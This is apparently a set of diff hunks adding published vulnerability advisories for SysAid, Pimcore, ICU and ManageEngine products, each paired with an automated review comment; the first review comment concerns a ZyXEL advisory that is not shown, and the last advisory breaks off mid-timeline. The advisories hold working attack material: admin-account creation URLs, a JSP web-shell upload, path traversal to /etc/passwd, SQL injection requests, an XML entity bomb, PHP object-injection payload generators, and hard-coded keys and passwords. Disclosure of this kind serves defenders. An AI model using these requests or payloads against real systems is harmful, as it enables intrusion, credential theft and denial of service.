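Review bot: The ">> Fix:" section states "There is NO FIX for this vulnerability", but the "Update (18/01/2017)" section and the last timeline entry say ZyXEL announced upcoming fixes for the 660HN v1 and v2. Reword the Fix section to say which models still have no fix so the two statements do not contradict each other. The timeline entry "Securiteam contacted the affected versions" presumably means vendors, and there are wording slips to clean up in "It is infamous as the includes Allegro RomPager", "The command in injection is in the remote_host parameter" and "This can circunvented".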


@ -0,0 +1,232 @@
>> Multiple vulnerabilities in SysAid Help Desk 14.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 03/06/2015 / Last updated: 10/06/2015
>> Background on the affected product:
"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance."
Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon.
All vulnerabilities affect both the Windows and Linux versions unless otherwise noted.
>> Technical details:
1)
Vulnerability: Administrator account creation
CVE-2015-2993 (same CVE as #10)
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123
This creates an account with the following credentials: mr_lit:secret
Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted.
2)
Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution)
CVE-2015-2994
Constraints: valid administrator account needed (see #1 to create a valid admin account)
Affected versions: unknown, at least 14.4
POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------81351919525780
-----------------------------81351919525780
Content-Disposition: form-data; name="activation"; filename="whatevs.jsp"
Content-Type: application/octet-stream
<html><body><%out.println(System.getProperty("os.name"));%></body><html>
-----------------------------81351919525780--
The response returns a page which contains the following:
var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";
var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";
if(imageUrl != null && $.trim(imageUrl).length > 0)
{
document.getElementById("cropbox").src = imageUrl;
document.getElementById("preview").src = thumbUrl;
parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp";
Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP.
3)
Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution)
CVE-2015-2995
Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details.
Affected versions: unknown, at least 14.3 and 14.4
POST /sysaid/rdslogs?rdsName=../../../../sample.war%00
<... WAR payload here ...>
4)
Vulnerability: Arbitrary file download
CVE-2015-2996 (same CVE as #8)
Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path)
Affected versions: unknown, at least 14.4
GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
5)
Vulnerability: Path disclosure
CVE-2015-2997
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4; only works on the Linux version
POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>
Metasploit PoC:
large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
'method' => 'POST',
'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
'ctype' => 'application/octet-stream',
'vars_get' => {
'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),
'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))
}
})
The response (res.body.to_s) will be similar to:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Error</TITLE></HEAD>
<BODY>
<H1>Internal Error No#14</H1>
<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2>
</BODY></HTML>
The tomcat path is revealed between the H2 tags.
6)
Vulnerability: Use of hard-coded cryptographic key
CVE-2015-2998
Constraints: N/A
Affected versions: unknown, at least 14.4
SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file.
Algorithm: DES password based encryption with MD5 hash
Key: "inigomontoya"
Salt: [-87, -101, -56, 50, 86, 53, -29, 3]
Iterations: 19
7)
Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp
CVE-2015-2999
Constraints: valid administrator account needed
Affected versions: unknown, at least 14.4
a)
POST /sysaid/genericreport HTTP/1.1
action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin
action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no
action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin
Parameters:
groupFilter
customSQL
(3 sample payloads are shown - the reportName has to be valid and each reportName expects different parameters)
b)
POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE
resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=
Parameter:
dir
c)
POST /sysaid/RFCGantt.jsp HTTP/1.1
listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true
Accepts injection between $$ in ganttSQL parameter.
8)
Vulnerability: Denial of service
CVE-2015-2996 (same CVE as #4)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero
This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).
9)
Vulnerability: XML Entity Expansion (leading to denial of service)
CVE-2015-3000
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
a)
POST /sysaid/agententry?deflate=0
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
b)
POST /sysaid/rdsmonitoringresponse
<lol bomb in POST data>
c)
POST /sysaid/androidactions
<lol bomb in POST data>
These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).
10)
Vulnerability: Uncontrolled file overwrite
CVE-2015-2993 (same CVE as #1)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm
This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker.
11)
Vulnerability: Use of hard-coded password for the SQL Server Express administrator account
CVE-2015-3001
Constraints: N/A
Affected versions: unknown, at least 14.4
When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1".
>> Fix:
Upgrade to version 15.2 or higher.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
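
Review bot: The ">> Fix:" section answers item 11 only with "Upgrade to version 15.2 or higher", but item 11 describes a password ("Password1") that the installer sets on the bundled SQL Server Express sa account, and nothing here says whether upgrading changes a password set by an earlier install. Suggest adding a line telling administrators to change the sa password on existing installations, or stating explicitly that 15.2 does so. Items 8 to 11 all read "Affected versions: unknown, at least 14.4", so it would also help to say whether 15.2 was verified as fixed for each item. Minor: "baloon" in item 9 should be "balloon", as spelled in item 8.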


@ -0,0 +1,202 @@
> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
====================================================================
Disclosure: 14/04/2014 / Last updated: 12/10/2014
Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2921)
Vulnerability: Arbitrary file deletion in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2922)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)
Summary:
This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from [3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all PHP versions.
Versions affected:
1.4.9 to 1.4.10 (inclusive) / 2.0.0 (possibly): Remote code execution (when server is running PHP <= 5.3.3).
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.
Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not possible, but the requirement was only enforced in 2.0.1.
Note that however the underlying vulnerability for both the remote code execution and the arbitrary file deletion is the same (unserialize() object injection), so it might be possible to execute code if any other Zend PHP POP chains are found in the future.
Fix for vulnerability:
https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280
Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):
https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7
PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):
https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b
Code snippets:
pimcore/lib/Pimcore/Tool/Newsletter.php(221):
public function getObjectByToken($token) {
$data = unserialize(base64_decode($token));
if($data) {
if($object = Object_Abstract::getById($data["id"])) {
if($version = $object->getLatestVersion()) {
$object = $version->getData();
}
This function is called in the same file in confirm() and unsubscribeByToken():
public function confirm($token) {
$object = $this->getObjectByToken($token);
if($object) {
public function unsubscribeByToken ($token) {
$object = $this->getObjectByToken($token);
if($object) {
In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
public function confirmAction() {
$this->enableLayout();
$this->view->success = false;
$newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)
if($newsletter->confirm($this->getParam("token"))) {
$this->view->success = true;
}
And also in unsubscribeAction():
public function unsubscribeAction() {
$this->enableLayout();
$newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)
$unsubscribeMethod = null;
$success = false;
if($this->getParam("email")) {
$unsubscribeMethod = "email";
$success = $newsletter->unsubscribeByEmail($this->getParam("email"));
}
if($this->getParam("token")) {
$unsubscribeMethod = "token";
$success = $newsletter->unsubscribeByToken($this->getParam("token"));
}
Mitigation:
Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.
References:
========================================================
[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)
<?php
class Zend_Search_Lucene_Index_FieldInfo
{
public $name = '<?php phpinfo(); die;?>';
}
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
protected $_dirPath = null;
public function __construct($path)
{
$this->_dirPath = $path;
}
}
interface Zend_Pdf_ElementFactory_Interface {}
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
protected $_docCount = 1;
protected $_name = 'foo';
protected $_directory;
protected $_fields;
protected $_files;
public function __construct($directory, $fields)
{
$this->_directory = $directory;
$this->_fields = array($fields);
$this->_files = new stdClass;
}
}
class Zend_Pdf_ElementFactory_Proxy
{
private $_factory;
public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
{
$this->_factory = $factory;
}
}
// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);
echo base64_encode(serialize($____proxy));
?>
========================================================
[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
[3] http://www.exploit-db.com/exploits/19573
========================================================
[4] Arbitrary file deletion, all PHP versions
<?php
class Zend_Http_Response_Stream
{
protected $stream;
protected $stream_name;
protected $_cleanup;
public function setStream($stream)
{
$this->stream = $stream;
return $this;
}
public function setCleanup($cleanup = true) {
$this->_cleanup = $cleanup;
}
public function setStreamName($stream_name) {
$this->stream_name = $stream_name;
return $this;
}
}
$resp = new Zend_Http_Response_Stream();
$resp->setStream(null);
$resp->setCleanup();
$resp->setStreamName("/tmp/deleteme");
echo base64_encode(serialize($resp));
?>
========================================================
[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter
[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip). The file mentioned is website/controllers/NewsletterController.php.
Other references:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://vagosec.org/2013/12/wordpress-rce-exploit/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
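
Review bot: The "Versions affected" paragraph says "payload [3] does not work on Pimcore versions between 2.0.1 and 2.1.0", but in the references [3] is the exploit-db link and the null-byte remote code execution payload is [1], so the sentence should refer to payload [1]. The Summary also says payload [4] deletes "a file in /tmp/deleteme", whereas the payload sets the stream name to /tmp/deleteme itself; "the file /tmp/deleteme" would match the code. In both controller snippets the comment says 'replace "crm" with the class name' while the constructor is passed "person"; either align the two or mark the snippet as quoted verbatim from the sample site.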


@ -0,0 +1,83 @@
>> Heap overflow and integer overflow in ICU library (v52 to v54)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 04/05/2015 / Last updated: 07/05/2015
>> Background on the affected products:
ICU is a mature, widely used set of C/C++ and Java libraries providing Unicode and Globalization support for software applications. ICU is widely portable and gives applications the same results on all platforms and between C/C++ and Java software.
>> Summary:
While fuzzing LibreOffice an integer overflow and a heap overflow were found in the ICU library. This library is used by LibreOffice and hundreds of other software packages.
Proof of concept files can be downloaded from [1]. These files have been tested with LibreOffice 4.3.3.2 and LibreOffice 4.4.0-beta2 and ICU 52.
Note that at this point in time it is unknown whether these vulnerabilities are exploitable.
Thanks to CERT [2] for helping disclose these vulnerabilities.
>> Technical details:
#1
Vulnerability: Heap overflow
CVE-2014-8146
The code to blame is the following (from ubidi.c:2148 in ICU 52):
dirProp=dirProps[limit-1];
if((dirProp==LRI || dirProp==RLI) && limit<pBiDi->length) {
pBiDi->isolateCount++;
pBiDi->isolates[pBiDi->isolateCount].stateImp=stateImp;
pBiDi->isolates[pBiDi->isolateCount].state=levState.state;
pBiDi->isolates[pBiDi->isolateCount].start1=start1;
}
else
processPropertySeq(pBiDi, &levState, eor, limit, limit);
Under certain conditions isolateCount is incremented too many times, which results in several out of bounds writes. See [1] for a more detailed analysis.
#2
Vulnerability: Integer overflow
CVE-2014-8147
The overflow is on the resolveImplicitLevels function (ubidi.c:2248):
pBiDi->isolates[pBiDi->isolateCount].state=levState.state;
pBiDi->isolates[].state is a int16, while levState.state is a int32.
The overflow causes an error when performing a malloc on pBiDi->insertPoints->points because insertPoints is adjacent in memory to isolates[].
The Isolate struct is defined in ubidiimp.h:184
typedef struct Isolate {
int32_t startON;
int32_t start1;
int16_t stateImp;
int16_t state;
} Isolate;
LevState is defined in ubidi.c:1748
typedef struct {
const ImpTab * pImpTab; /* level table pointer */
const ImpAct * pImpAct; /* action map array */
int32_t startON; /* start of ON sequence */
int32_t startL2EN; /* start of level 2 sequence */
int32_t lastStrongRTL; /* index of last found R or AL */
int32_t state; /* current state */
int32_t runStart; /* start position of the run */
UBiDiLevel runLevel; /* run level before implicit solving */
} LevState;
>> Fix:
All ICU releases between 52 and 54 are affected. Upgrade to ICU 55.1 to fix these vulnerabilities.
There are many other software packages which embed the ICU code and will need to be updated.
Patches that fix these vulnerabilities can be obtained from the ICU project in [3] and [4].
>> References:
[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43887.zip)
[2] https://www.kb.cert.org/vuls/id/602540
[3] http://bugs.icu-project.org/trac/changeset/37080
[4] http://bugs.icu-project.org/trac/changeset/37162
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
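
Review bot: Item #2 cites ubidi.c:2248 for the statement "pBiDi->isolates[pBiDi->isolateCount].state=levState.state;", which already appears in the item #1 snippet attributed to ubidi.c:2148, so one of the two line references looks mistyped and should be checked against the ICU 52 source. Item #2 is titled "Integer overflow" while the text describes an int32 value (levState.state) being stored into an int16 field (Isolate.state); the advisory does not explain how that narrowing store leads to the malloc error on pBiDi->insertPoints->points, and a sentence connecting the two would make the reasoning followable. In the Fix section, "All ICU releases between 52 and 54" should say whether the range is inclusive, as the title's "v52 to v54" suggests.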


@ -11,3 +11,82 @@ ManageEngine IT360 8 through 10.1.1 build 10110
www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]
>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015
>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.
>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.
#1
Vulnerability:
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996
Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]
IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]
#2
Vulnerability:
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360)
CVE-2014-3997
Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
PMP:
GET /MetadataServlet.dat?sv=[SQLi]
IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
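
Review bot: The Fix line under #2 (MetadataServlet) repeats "Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330" from #1, although #2 lists only Password Manager Pro and IT360 as affected; either drop the Desktop Central build there or add Desktop Central to the affected list. The opening sentence of Technical details has the same inconsistency: it says both injections have been present in all three products since 2006, while #2 excludes Desktop Central and gives 03-Apr-2008. The context lines at the top of the hunk show the file already carried the MetadataServlet URLs, so the appended advisory repeats them; a separator or a note that the earlier entry is superseded would make the file easier to read.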


@ -0,0 +1,52 @@
>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 31/12/2014 / Last updated: 05/01/2015
>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
This vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.
>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards
GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337
This creates a new administrator user "dcpwn" with the password "admin". You can now execute code on all devices managed by Desktop Central!
A Metasploit auxiliary module that exploits this vulnerability has been released.
>> Fix:
(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.
This vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.
Timeline of disclosure:
11/09/2014:
- Vulnerability information sent to Romanus, Desktop Central project manager.
23/09/2014:
- Requested an update. Received reply "My development team is working on this to provide a fix. Let me check this and update you the status."
17/10/2014
- Requested an update. Received reply on the 19th "Due to festive season here i'm unable to get the update. Let me find this and update you by Monday."
30/10/2014
- Requested an update. Received reply "The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing."
23/11/2014
- Requested an update. Received reply on the 24th "I was traveling hence couldn't give you an update. It should get released by next week or early second week. I'll send you an update on this."
15/12/2014
- Requested an update. Received reply on the 18th "it has been handled from the Desktop Central side and awaiting for the release".
31/12/2014
- Released information and exploit 112 days after initial disclosure.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
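
Review bot: "Affected versions: all versions from v7 onwards" is open-ended even though the Fix section, updated 05/01/2015, names version 9.0 build 90109 as fixed; the range should be closed at the last vulnerable build. The background sentence "This vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days" is stale next to the updated Fix and is repeated almost word for word under it, so one of the two can go. The Fix section should also advise administrators to review the list of administrator accounts after upgrading, since the text does not say that the upgrade removes accounts already added through this request.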


@ -0,0 +1,73 @@
>> Multiple vulnerabilities in ManageEngine EventLog Analyzer
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 05/11/2014 / Last updated: 05/11/2014
>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more."
>> Technical details:
#1
Vulnerability: SQL database information disclosure (read any table in the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser --> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints
GET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)
#2
Vulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)
A Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.
Timeline of disclosure:
28/08/2014
- Requested contact to email via ManageEngine Security Response Center
- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).
28/08/2014
- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.
31/08/2014
- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).
- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with "We appreciate your efforts and will fix your vulnerabilities, please bear with us".
